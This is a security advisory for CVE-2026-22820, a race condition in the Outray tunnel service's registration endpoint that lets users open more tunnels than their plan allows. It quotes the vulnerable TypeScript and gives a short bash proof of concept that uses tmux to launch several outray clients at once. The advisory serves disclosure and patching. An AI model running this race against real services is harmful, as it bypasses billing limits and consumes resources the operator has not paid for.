GHSA-3PQC-836W-JGR7
Vulnerability from github – Published: 2026-01-13 21:53 – Updated: 2026-01-21 16:17
VLAI?
Summary
Outray cli is vulnerable to race conditions in tunnels creation
Details
Summary
A TOCTOU race condition vulnerability allows a user to exceed the set number of active tunnels in their subscription plan.
Details
Affected conponent: apps/web/src/routes/api/tunnel/register.ts
- /tunnel/register endpoint code-:
// Check if tunnel already exists in database
const [existingTunnel] = await db
.select()
.from(tunnels)
.where(eq(tunnels.url, tunnelUrl));
const isReconnection = !!existingTunnel;
console.log(
`[TUNNEL LIMIT CHECK] Org: ${organizationId}, Tunnel: ${tunnelId}`,
);
console.log(
`[TUNNEL LIMIT CHECK] Is Reconnection: ${isReconnection}`,
);
console.log(
`[TUNNEL LIMIT CHECK] Plan: ${currentPlan}, Limit: ${tunnelLimit}`,
);
// Check limits only for NEW tunnels (not reconnections)
if (!isReconnection) {
// Count active tunnels from Redis SET
const activeCount = await redis.scard(setKey);
console.log(
`[TUNNEL LIMIT CHECK] Active count in Redis: ${activeCount}`,
);
// The current tunnel is NOT yet in the online_tunnels set (added after successful registration)
// So we check if activeCount >= limit (not >)
if (activeCount >= tunnelLimit) {
console.log(
`[TUNNEL LIMIT CHECK] REJECTED - ${activeCount} >= ${tunnelLimit}`,
);
return json(
{
error: `Tunnel limit reached. The ${currentPlan} plan allows ${tunnelLimit} active tunnel${tunnelLimit > 1 ? "s" : ""}.`,
},
{ status: 403 },
);
}
console.log(
`[TUNNEL LIMIT CHECK] ALLOWED - ${activeCount} < ${tunnelLimit}`,
);
} else {
console.log(`[TUNNEL LIMIT CHECK] SKIPPED - Reconnection detected`);
}
if (existingTunnel) {
// Tunnel with this URL already exists, update lastSeenAt
await db
.update(tunnels)
.set({ lastSeenAt: new Date() })
.where(eq(tunnels.id, existingTunnel.id));
return json({
success: true,
tunnelId: existingTunnel.id,
});
}
// Create new tunnel record
const tunnelRecord = {
id: randomUUID(),
url: tunnelUrl,
userId,
organizationId,
name: name || null,
protocol,
remotePort: remotePort || null,
lastSeenAt: new Date(),
createdAt: new Date(),
updatedAt: new Date(),
};
await db.insert(tunnels).values(tunnelRecord);
return json({ success: true, tunnelId: tunnelRecord.id });
} catch (error) {
console.error("Tunnel registration error:", error);
return json({ error: "Internal server error" }, { status: 500 });
}
- It checks if the tunnel exists in the database.
// Check if tunnel already exists in database
const [existingTunnel] = await db
.select()
.from(tunnels)
.where(eq(tunnels.url, tunnelUrl));
const isReconnection = !!existingTunnel;
- Limit is checked here-:
// Check limits only for NEW tunnels (not reconnections)
if (!isReconnection) {
// Count active tunnels from Redis SET
const activeCount = await redis.scard(setKey);
console.log(
`[TUNNEL LIMIT CHECK] Active count in Redis: ${activeCount}`,
);
- Redis is checked for existing tunnel to check for reconnection.
// Check limits only for NEW tunnels (not reconnections)
if (!isReconnection) {
// Count active tunnels from Redis SET
const activeCount = await redis.scard(setKey);
console.log(
`[TUNNEL LIMIT CHECK] Active count in Redis: ${activeCount}`,
);
- If the tunnel limit is exceeded, it pops up the tunnel limit error.
if (activeCount >= tunnelLimit) {
console.log(
`[TUNNEL LIMIT CHECK] REJECTED - ${activeCount} >= ${tunnelLimit}`,
);
return json(
{
error: `Tunnel limit reached. The ${currentPlan} plan allows ${tunnelLimit} active tunnel${tunnelLimit > 1 ? "s" : ""}.`,
},
{ status: 403 },
);
- If the limit is not exceeded, it triggers a the
InsertStatement without locking transactions from other request
await db.insert(tunnels).values(tunnelRecord);
- If parallel requests are made by the
wshandlerin/outray/outray-main/apps/tunnel/src/core/WSHandler.tsfrom the command line app. A request can work on a non updated row because theinsertrow has not been triggered allowing the user to bypass the limit. It is much explained in the proof of concept. The key takeaway is db transactions should remain locked.
PoC
Using this simple bash script, the outray binary will be run at the same time in one tmux window, demonstrating the race condition and opening 4 tunnels.
#!/usr/bin/env bash
# POC for Outray Tunnel Race condition
SESSION="outray-race"
PORTS=(8090 4000 5000 6000)
# Create new detached tmux session
tmux new-session -d -s "$SESSION" "echo '[*] outray race session started'; bash"
# Split the panes and run outray
for i in "${!PORTS[@]}"; do
port="${PORTS[$i]}"
if [ "$i" -ne 0 ]; then
tmux split-window -t "$SESSION" -h
tmux select-layout -t "$SESSION" tiled
fi
tmux send-keys -t "$SESSION" "echo '[*] Running outray on port $port'; outray $port" C-m
done
tmux set-window-option -t "$SESSION" synchronize-panes off
echo "[+] tmux session '$SESSION' created"
echo "[+] Attach with: tmux attach -t $SESSION"
Running this
seeker@instance-20260106-20011$ bash kay.sh
[+] tmux session 'outray-race' created
[+] Attach with: tmux attach -t outray-race
seeker@instance-20260106-20011$ tmux attach -t outray-race
Impact
By exploiting this TOCTOU race condition in the affected component, the intended limit is bypassed and server resources is used with no extra billing charges on the user.
Severity ?
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "outray"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.1.5"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-22820"
],
"database_specific": {
"cwe_ids": [
"CWE-367"
],
"github_reviewed": true,
"github_reviewed_at": "2026-01-13T21:53:44Z",
"nvd_published_at": "2026-01-14T15:16:05Z",
"severity": "MODERATE"
},
"details": "### Summary\n\nA TOCTOU race condition vulnerability allows a user to exceed the set number of active tunnels in their subscription plan.\n\n### Details\n\nAffected conponent: `apps/web/src/routes/api/tunnel/register.ts`\n- `/tunnel/register` endpoint code-:\n\n```ts\n// Check if tunnel already exists in database\n const [existingTunnel] = await db\n .select()\n .from(tunnels)\n .where(eq(tunnels.url, tunnelUrl));\n\n const isReconnection = !!existingTunnel;\n\n console.log(\n `[TUNNEL LIMIT CHECK] Org: ${organizationId}, Tunnel: ${tunnelId}`,\n );\n console.log(\n `[TUNNEL LIMIT CHECK] Is Reconnection: ${isReconnection}`,\n );\n console.log(\n `[TUNNEL LIMIT CHECK] Plan: ${currentPlan}, Limit: ${tunnelLimit}`,\n );\n\n // Check limits only for NEW tunnels (not reconnections)\n if (!isReconnection) {\n // Count active tunnels from Redis SET\n const activeCount = await redis.scard(setKey);\n console.log(\n `[TUNNEL LIMIT CHECK] Active count in Redis: ${activeCount}`,\n );\n\n // The current tunnel is NOT yet in the online_tunnels set (added after successful registration)\n // So we check if activeCount \u003e= limit (not \u003e)\n if (activeCount \u003e= tunnelLimit) {\n console.log(\n `[TUNNEL LIMIT CHECK] REJECTED - ${activeCount} \u003e= ${tunnelLimit}`,\n );\n return json(\n {\n error: `Tunnel limit reached. The ${currentPlan} plan allows ${tunnelLimit} active tunnel${tunnelLimit \u003e 1 ? \"s\" : \"\"}.`,\n },\n { status: 403 },\n );\n }\n console.log(\n `[TUNNEL LIMIT CHECK] ALLOWED - ${activeCount} \u003c ${tunnelLimit}`,\n );\n } else {\n console.log(`[TUNNEL LIMIT CHECK] SKIPPED - Reconnection detected`);\n }\n\n if (existingTunnel) {\n // Tunnel with this URL already exists, update lastSeenAt\n await db\n .update(tunnels)\n .set({ lastSeenAt: new Date() })\n .where(eq(tunnels.id, existingTunnel.id));\n\n return json({\n success: true,\n tunnelId: existingTunnel.id,\n });\n }\n\n // Create new tunnel record\n const tunnelRecord = {\n id: randomUUID(),\n url: tunnelUrl,\n userId,\n organizationId,\n name: name || null,\n protocol,\n remotePort: remotePort || null,\n lastSeenAt: new Date(),\n createdAt: new Date(),\n updatedAt: new Date(),\n };\n\n await db.insert(tunnels).values(tunnelRecord);\n\n return json({ success: true, tunnelId: tunnelRecord.id });\n } catch (error) {\n console.error(\"Tunnel registration error:\", error);\n return json({ error: \"Internal server error\" }, { status: 500 });\n }\n```\n- It checks if the tunnel exists in the database.\n```ts\n// Check if tunnel already exists in database\n const [existingTunnel] = await db\n .select()\n .from(tunnels)\n .where(eq(tunnels.url, tunnelUrl));\n\n const isReconnection = !!existingTunnel;\n```\n\n- Limit is checked here-:\n```ts\n// Check limits only for NEW tunnels (not reconnections)\n\nif (!isReconnection) {\n\n// Count active tunnels from Redis SET\n\nconst activeCount = await redis.scard(setKey);\n\nconsole.log(\n\n`[TUNNEL LIMIT CHECK] Active count in Redis: ${activeCount}`,\n\n);\n```\n- Redis is checked for existing tunnel to check for reconnection.\n```ts\n// Check limits only for NEW tunnels (not reconnections)\n if (!isReconnection) {\n // Count active tunnels from Redis SET\n const activeCount = await redis.scard(setKey);\n console.log(\n `[TUNNEL LIMIT CHECK] Active count in Redis: ${activeCount}`,\n );\n```\n\n- If the tunnel limit is exceeded, it pops up the tunnel limit error.\n\n```ts\nif (activeCount \u003e= tunnelLimit) {\n console.log(\n `[TUNNEL LIMIT CHECK] REJECTED - ${activeCount} \u003e= ${tunnelLimit}`,\n );\n return json(\n {\n error: `Tunnel limit reached. The ${currentPlan} plan allows ${tunnelLimit} active tunnel${tunnelLimit \u003e 1 ? \"s\" : \"\"}.`,\n },\n { status: 403 },\n );\n```\n- If the limit is not exceeded, it triggers a the `Insert` Statement without locking transactions from other request\n\n```ts\nawait db.insert(tunnels).values(tunnelRecord);\n```\n- If parallel requests are made by the `wshandler` in `/outray/outray-main/apps/tunnel/src/core/WSHandler.ts` from the command line app. A request can work on a non updated row because the `insert` row has not been triggered allowing the user to bypass the limit. It is much explained in the proof of concept. The key takeaway is db transactions should remain locked.\n\n### PoC\n\nUsing this simple bash script, the `outray` binary will be run at the same time in one `tmux` window, demonstrating the race condition and opening 4 tunnels.\n\n```bash\n#!/usr/bin/env bash\n\n# POC for Outray Tunnel Race condition\nSESSION=\"outray-race\"\nPORTS=(8090 4000 5000 6000)\n\n# Create new detached tmux session\ntmux new-session -d -s \"$SESSION\" \"echo \u0027[*] outray race session started\u0027; bash\"\n\n# Split the panes and run outray\nfor i in \"${!PORTS[@]}\"; do\n port=\"${PORTS[$i]}\"\n\n if [ \"$i\" -ne 0 ]; then\n tmux split-window -t \"$SESSION\" -h\n tmux select-layout -t \"$SESSION\" tiled\n fi\n\n tmux send-keys -t \"$SESSION\" \"echo \u0027[*] Running outray on port $port\u0027; outray $port\" C-m\ndone\n\ntmux set-window-option -t \"$SESSION\" synchronize-panes off\n\necho \"[+] tmux session \u0027$SESSION\u0027 created\"\necho \"[+] Attach with: tmux attach -t $SESSION\"\n\n```\n\nRunning this\n\n```\nseeker@instance-20260106-20011$ bash kay.sh\n[+] tmux session \u0027outray-race\u0027 created\n[+] Attach with: tmux attach -t outray-race\n\nseeker@instance-20260106-20011$ tmux attach -t outray-race\n```\n\n\u003cimg width=\"1909\" height=\"1021\" alt=\"image\" src=\"https://github.com/user-attachments/assets/c234cc94-fc25-4542-abdf-815332493a85\" /\u003e\n\n\n\u003cimg width=\"1907\" height=\"936\" alt=\"image\" src=\"https://github.com/user-attachments/assets/1c302d7f-1ca6-46af-ab72-60fd01cdfded\" /\u003e\n\n### Impact\n\nBy exploiting this TOCTOU race condition in the affected component, the intended limit is bypassed and server resources is used with no extra billing charges on the user.",
"id": "GHSA-3pqc-836w-jgr7",
"modified": "2026-01-21T16:17:07Z",
"published": "2026-01-13T21:53:44Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/akinloluwami/outray/security/advisories/GHSA-3pqc-836w-jgr7"
},
{
"type": "WEB",
"url": "https://github.com/outray-tunnel/outray/security/advisories/GHSA-3pqc-836w-jgr7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22820"
},
{
"type": "WEB",
"url": "https://github.com/outray-tunnel/outray/commit/08c61495761349e7fd2965229c3faa8d7b1c1581"
},
{
"type": "PACKAGE",
"url": "https://github.com/akinloluwami/outray"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N",
"type": "CVSS_V3"
},
{
"score": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
"type": "CVSS_V4"
}
],
"summary": "Outray cli is vulnerable to race conditions in tunnels creation"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…